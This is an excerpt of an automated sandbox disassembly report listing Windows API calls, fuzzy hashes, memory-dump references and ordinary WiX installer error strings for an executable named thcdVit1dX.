                                                                                                                                                          • Opcode Fuzzy Hash: 678f7e05db71df02d347992ae81a9d48ecdf6d4daa0fa0d390600d566aaad62c
                                                                                                                                                          • Instruction Fuzzy Hash: A9214536A84220B7EB322A514E49F3B6A54AB91B60F504037FD09FA2D1D6FC8C4252DE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                          • API String ID: 0-2188560433
                                                                                                                                                          • Opcode ID: d1fb0e47d3c72037511d7971c8c46603672b706d5a24e2e3c646380ffa47c24c
                                                                                                                                                          • Instruction ID: 55654f764c3439da8eb9bbbd3e0f2676a390b32f5fae097e90c6ddff5eba7411
                                                                                                                                                          • Opcode Fuzzy Hash: d1fb0e47d3c72037511d7971c8c46603672b706d5a24e2e3c646380ffa47c24c
                                                                                                                                                          • Instruction Fuzzy Hash: 4B21F6B2E41314B7EB219A558C0AF9F7F649F41B54F51407BFA04BA2E1E2789A00D698
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004706F3,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 0047040A
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 004703B9, 00470492, 00470497, 004704AC
                                                                                                                                                          • Failed to get max length of input buffer., xrefs: 004703AD
                                                                                                                                                          • Failed to re-allocate more space for expanded path., xrefs: 00470475
                                                                                                                                                          • Failed to get max length of written input buffer., xrefs: 00470464
                                                                                                                                                          • Failed to expand environment variables in string: %ls, xrefs: 004704A0
                                                                                                                                                          • Failed to allocate space for expanded path., xrefs: 004703E6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\env2util.cpp
                                                                                                                                                          • API String ID: 1452528299-2127845425
                                                                                                                                                          • Opcode ID: b627a70392b70cb35ec876b61fbe19fbc857b5890f95688b41457eae506945b7
                                                                                                                                                          • Instruction ID: 62115705e0fb5d731011c591359a4a125e4e9eaa5f6310222d535d2314273a35
                                                                                                                                                          • Opcode Fuzzy Hash: b627a70392b70cb35ec876b61fbe19fbc857b5890f95688b41457eae506945b7
                                                                                                                                                          • Instruction Fuzzy Hash: 12310A72A41320FBE7325A558C06FEB7A589B11B60F118167FF08FF2C1E67C8D008699
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                          • API String ID: 0-1097950227
                                                                                                                                                          • Opcode ID: 45f9002e9810b9563c67f962355f049f41ed8f9e47c4e59d44635b1045eeb24a
                                                                                                                                                          • Instruction ID: ef832becddccedab5efee911b2044f22ad6ad69be1f787cef215d9f7e9fc0e8f
                                                                                                                                                          • Opcode Fuzzy Hash: 45f9002e9810b9563c67f962355f049f41ed8f9e47c4e59d44635b1045eeb24a
                                                                                                                                                          • Instruction Fuzzy Hash: 32210972A41724B7D32196958C85FBF766C9B41B64F51022BF904BA1C0F7BCAD0097AE
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,00467DA4), ref: 004681D4
                                                                                                                                                            • Part of subcall function 0040758B: GetProcessHeap.KERNEL32(00000000,?,?,?,004390BB,?), ref: 00407595
                                                                                                                                                            • Part of subcall function 0040758B: HeapFree.KERNEL32(00000000,?,?,004390BB,?), ref: 0040759C
                                                                                                                                                            • Part of subcall function 0040758B: GetLastError.KERNEL32(?,?,004390BB,?), ref: 004075A6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$ErrorFreeLastProcesslstrlen
                                                                                                                                                          • String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1805815496-1440198124
Strings
• SOFTWARE\Policies\, xrefs: 00470A0C
• Failed to combine logging path with root path., xrefs: 00470A1C
• Failed to open policy registry key., xrefs: 00470A74
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470A2B, 00470A83
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Similarity
• API ID:
• String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
• API String ID: 0-956796463
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,0041B99C,WiX\Burn,EngineWorkingDirectory,00000000), ref: 00470D12
Strings
• Failed to open policy key: %ls, name: %ls, xrefs: 00470CE4
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470C93, 00470CF3
• Failed to open policy key: %ls, xrefs: 00470C87
Similarity
• API ID: Close
• String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
• API String ID: 3535843008-840529963
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,0041E59F,WiX\Burn,PackageCache,00000000,0000001C), ref: 00470C27
Strings
• Failed to open policy key: %ls, name: %ls, xrefs: 00470BFC
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470BAE, 00470C08
• Failed to open policy key: %ls, xrefs: 00470BA2
Similarity
• API ID: Close
• String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
• API String ID: 3535843008-840529963
APIs
  • Part of subcall function 00439DD1: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004392AF,?,?,?), ref: 00439DF9
  • Part of subcall function 00439DD1: GetLastError.KERNEL32(?,004392AF,?,?,?), ref: 00439E03
• ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 004392BD
• GetLastError.KERNEL32 ref: 004392C7
Similarity
• API ID: ErrorFileLast$PointerRead
• String ID: Failed to read during cabinet extraction.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
• API String ID: 2170121939-580274504
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004392AF,?,?,?), ref: 00439DF9
• GetLastError.KERNEL32(?,004392AF,?,?,?), ref: 00439E03
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move to virtual file pointer.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
• API String ID: 2976181284-3968184250
APIs
  • Part of subcall function 00401453: GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
  • Part of subcall function 00401453: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
• LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
• GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 004018F3, 004018F8, 0040190D
• Failed to load library with LOAD_LIBRARY_SEARCH_SYSTEM32: %ls., xrefs: 00401901
Similarity
• API ID: ErrorLast$HandleLibraryLoadModule
• String ID: Failed to load library with LOAD_LIBRARY_SEARCH_SYSTEM32: %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 4252302101-2048249808
                                                                                                                                                          • Opcode ID: 362ba4bc44472fbb3cff0f1d0979729c261a55f77d939210c8d0b29170138464
                                                                                                                                                          • Instruction ID: a0962a609da333b22fcb3a8d3a800a0755a1864bc8b25d0220e779f0ad846446
                                                                                                                                                          • Opcode Fuzzy Hash: 362ba4bc44472fbb3cff0f1d0979729c261a55f77d939210c8d0b29170138464
                                                                                                                                                          • Instruction Fuzzy Hash: 9C018477A4122477DB212A558C15F9F7E54AB42BA1F41807AFE08BA2F1D6384D00D7D8
APIs
• RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467BCC, 00467BD2, 00467BE9
• Failed to open registry key, root: %x, subkey: %ls., xrefs: 00467BDE
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Open
• String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 71445658-1873020677
• Opcode ID: 89a3ab6d174875368107eb3f19057f5f23784cc12ec836a302179b73ec5c8565
• Instruction ID: 77467f32aca5e4bb3de793605dd258dc594eb0d6e5bfc4e31786fc691a298e3b
• Opcode Fuzzy Hash: 89a3ab6d174875368107eb3f19057f5f23784cc12ec836a302179b73ec5c8565
• Instruction Fuzzy Hash: 9F01267610811977E7211E168C05E9B3A5ADFC8BA8F15402BFD04AB350FA3E9C51D6FE
APIs
• ExitProcess.KERNEL32 ref: 0040111A
  • Part of subcall function 0040252B: GetFileAttributesW.KERNELBASE(?,00000000,?,004010DF,?,00000000), ref: 00402534
  • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
  • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FileFind$AttributesCloseErrorExitFirstLastLibraryLoadProcess
• String ID: %ls.local$Comctl32.dll
• API String ID: 3652749591-3877841543
• Opcode ID: abf633eda87f5c5333276b9237a49600086451751ce93b08044b869ba94c2540
• Instruction ID: 201a56c8dcb74d3312d6275c32d80f8ba94e2a8376a63c3c6208d54dfd2ed429
• Opcode Fuzzy Hash: abf633eda87f5c5333276b9237a49600086451751ce93b08044b869ba94c2540
• Instruction Fuzzy Hash: AAF08170900119BADB10AB52CD0BECFBE69DF45358F104077F904B50A2E2789B40D6A9
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00476553
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PAbn$b
• API String ID: 1269201914-1508761821
• Opcode ID: 190d05f9941c82c4bf93ba8b4716d9cf1710172f7c85c6380006b52710966e06
• Instruction ID: 0c9dc849aec97c9d68a7300d31f44d07c0dca46addefbe3cbecb98dfa97d1207
• Opcode Fuzzy Hash: 190d05f9941c82c4bf93ba8b4716d9cf1710172f7c85c6380006b52710966e06
• Instruction Fuzzy Hash: D2B0129139D4017C3104A54BAC0BF77014CD5C0B11330C46FF449C00C4D5AC1C0120BF
APIs
• GetCurrentProcess.KERNEL32(00459B7E,?,00459A6E,00000000,?,?,00459B7E,83C6D434,?,00459B7E), ref: 00459A85
• TerminateProcess.KERNEL32(00000000,?,00459A6E,00000000,?,?,00459B7E,83C6D434,?,00459B7E), ref: 00459A8C
• ExitProcess.KERNEL32 ref: 00459A9E
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 96780c8f12227157a397e913b63b9aecaaeaf510d5277b68238e2567fa90d69e
• Instruction ID: 249a0697a702f3c8123cbc47c241fca6346adbe6fb53342c8db07f24f35b5e25
• Opcode Fuzzy Hash: 96780c8f12227157a397e913b63b9aecaaeaf510d5277b68238e2567fa90d69e
• Instruction Fuzzy Hash: B9D06731004244ABCF016F61DD099593F26EA443567948025BD0D46222DB399D95DB98
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00476553
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PAbn
• API String ID: 1269201914-1724936755
• Opcode ID: 3a0db4904d6e7edf5fce4306bed952b1c6eb18ed4e1d84f575337f8b86f882df
• Instruction ID: 40e69d3651a5489e9974cd721f0487eff1e3fb1deeea2aa36ae1448399262d31
• Opcode Fuzzy Hash: 3a0db4904d6e7edf5fce4306bed952b1c6eb18ed4e1d84f575337f8b86f882df
• Instruction Fuzzy Hash: E5B0129139D001BC3104E25BAC0BD77065CC5C0B15330C06FF809C4084D59C5C4110BF
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00476553
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PAbn
• API String ID: 1269201914-1724936755
• Opcode ID: 40adcf177309754a0db56859277a54aa3da13fae2327479306f094237ae4c5ba
• Instruction ID: 8931a35f0c929efe153df1cb93ed650b88fc7fdcb14951ac5c2c7ff99fc9437f
• Opcode Fuzzy Hash: 40adcf177309754a0db56859277a54aa3da13fae2327479306f094237ae4c5ba
• Instruction Fuzzy Hash: 75B012913DD4017C31046547ED0BD77051CC6C0B11330C46FF505D0084959D1D0220BF
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,?,00465957,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 004663B1
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004B2588,?,?,00465957,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 004663C2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                          • Opcode ID: ff3709a068d38649a431524fc6aa60f1ea44d99d282cb4a19f7c3145fadd2140
                                                                                                                                                          • Instruction ID: 8b45a3b825b823f7d97fab816ebb8928825ecf6564b6da56a278c3089ee668a5
                                                                                                                                                          • Opcode Fuzzy Hash: ff3709a068d38649a431524fc6aa60f1ea44d99d282cb4a19f7c3145fadd2140
                                                                                                                                                          • Instruction Fuzzy Hash: D6D0C9326041587786113BBAEC088DAFAACDEA2AB27418537F609D212096E5895196A9
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,004680A5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,00467DA4,00000000), ref: 004672A7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3660427363-0
                                                                                                                                                          • Opcode ID: 0faa95cedd2eb23138784b942ac3e0235222f9b5606accee816a1fa6fceaac9f
                                                                                                                                                          • Instruction ID: e5df0cd4d58953838b4ac939886ce18eb87fb029d75ad03d6fcd903786f125ae
                                                                                                                                                          • Opcode Fuzzy Hash: 0faa95cedd2eb23138784b942ac3e0235222f9b5606accee816a1fa6fceaac9f
                                                                                                                                                          • Instruction Fuzzy Hash: 8221D031A0411AEBCB168E55CC40A6F3BB6EF95308F248067FD009B364EB359D41EB99
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00451EEA: GetModuleHandleW.KERNEL32(00000000,00459A0F,83C6D434,?,00459B7E), ref: 00451EEC
                                                                                                                                                          • ___security_init_cookie.LIBCMT ref: 004517F0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
